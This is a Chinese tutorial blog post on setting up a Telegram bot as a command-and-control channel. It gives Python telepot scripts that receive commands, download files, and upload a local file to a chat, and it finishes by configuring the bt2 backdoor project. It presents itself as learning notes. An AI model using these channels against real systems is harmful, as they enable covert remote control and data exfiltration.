TG 下的C2创建过程

Grav1ty

原文链接：TG 下的C2创建过程

0x00:简介

没啥新技术，基本就是老技术。我这里只是做笔记，仅供学习。

0x01:环境部署过程

1、申请TG token

1. https://telegram.me/botfather

复制代码

1. 
   
2. https://core.telegram.org/bots/api

复制代码

2、利用python 调用

1. 
   
2. #!python
   
3. #!/usr/bin/python
   
4. import sys
   
5. import time
   
6. import pprint
   
7. import telepot
   
8. bot = telepot.Bot('you-token')
   
9. print ('Listening ...')
   
10. def handle(msg):
    
11.     print(msg)
    
12. def main():
    
13.     try:
    
14.         bot.message_loop(handle)
    
15.     except Exception as err:
    
16.         print (err)
    
17.     while True:
    
18.         time.sleep(10)
    
19. if __name__ == '__main__':
    
20.     main()

复制代码

3、测试token 调用效果

（记得要国外服务器的运行脚本，不然运行没结果。我自己的没结果）

服务器上运行

到TG上去对你的机器人说话

Python脚本看到你的消息

4、 服务端到客户端

PS:建议看一下API文档在来看

提取文字消息

使用glance()可以从接收的消息中提取一个元组

1. 
   
2. （content_type，chat_type，chat_id）

复制代码

content_type 包括

1. 
   
2. text, audio, document, photo, sticker, video, voice,contact, location, venue, new_chat_member, left_chat_member, etc.

复制代码

chat_type 包括

1. 
   
2. private, group, or channel.

复制代码

所以我们可以使用glance()把接收的文字消息提取出来，代码如下：

1. #!python
   
2. #!/usr/bin/python
   
3. import sys
   
4. import time
   
5. import pprint
   
6. import telepot
   
7. bot = telepot.Bot('you-token')
   
8. print ('Listening ...')
   
9. def handle(msg):
   
10.     content_type, chat_type, chat_id = telepot.glance(msg)   
    
11. 
    
12.     if content_type == 'text':
    
13.         received_command = msg['text']
    
14.         print (received_command)        
    
15.     else:
    
16.         print (content_type, chat_type, chat_id)
    
17.         return
    
18. def main():  
    
19.     try:
    
20.         bot.message_loop(handle)
    
21.     except Exception as err:
    
22.         print (err)
    
23.     while True:
    
24.         time.sleep(10)
    
25. 
    
26. if __name__ == '__main__':
    
27.     main()

复制代码

接收文件

执行接收消息的python代码，可获得接收文件的消息格式.

下载文件需要使用

1. 
   
2. bot.download_file(file_id, filename)

复制代码

1. 
   
2. #!python
   
3. #!/usr/bin/python
   
4. import sys
   
5. import time
   
6. import pprint
   
7. import telepot
   
8. bot = telepot.Bot('you-token')
   
9. print ('Listening ...')
   
10. def handle(msg):
    
11.     content_type, chat_type, chat_id = telepot.glance(msg)   
    
12. 
    
13.     if content_type == 'text':
    
14.         received_command = msg['text']
    
15.         print (received_command)   
    
16.     elif content_type == 'document':
    
17.         file_id = msg['document']['file_id']
    
18.         filename = msg['document']['file_name']
    
19.         bot.download_file(file_id, filename)
    
20.         print ("[+] Download File Success!")
    
21.     else:
    
22.         print (content_type, chat_type, chat_id)
    
23.         return
    
24. def main():  
    
25.     try:
    
26.         bot.message_loop(handle)
    
27.     except Exception as err:
    
28.         print (err)
    
29.     while True:
    
30.         time.sleep(10)
    
31. 
    
32. if __name__ == '__main__':
    
33.     main()

复制代码

5、 客户端到服务端

发送消息使用

1. 
   
2. bot.sendMessage(chat_id, message)

复制代码

向Server端发送一条消息，代码如下

1. 
   
2. #!python
   
3. import telepot
   
4. from pprint import pprint
   
5. bot = telepot.Bot('you-token')
   
6. bot.sendMessage(id, 'Hello C2 Server Jaky')

复制代码

发送文件使用

1. 
   
2. bot.sendDocument(chat_id,file)

复制代码

代码如下：

1. 
   
2. #!python
   
3. import telepot
   
4. from pprint import pprint
   
5. bot = telepot.Bot('you-token')
   
6. f = open('/root/学习资料-种子.txt', 'rb')  
   
7. bot.sendDocument(id, f)

复制代码

0x02:环境测试过程1、搭建C2 Server

1. 
   
2. git clone https://github.com/blazeinfosec/bt2.git

复制代码

2、编辑参数
编辑bt2.py设置以下参数

1. 
   
2. API_TOKEN：token
   
3. BOTMASTER_ID:自己帐号的id

复制代码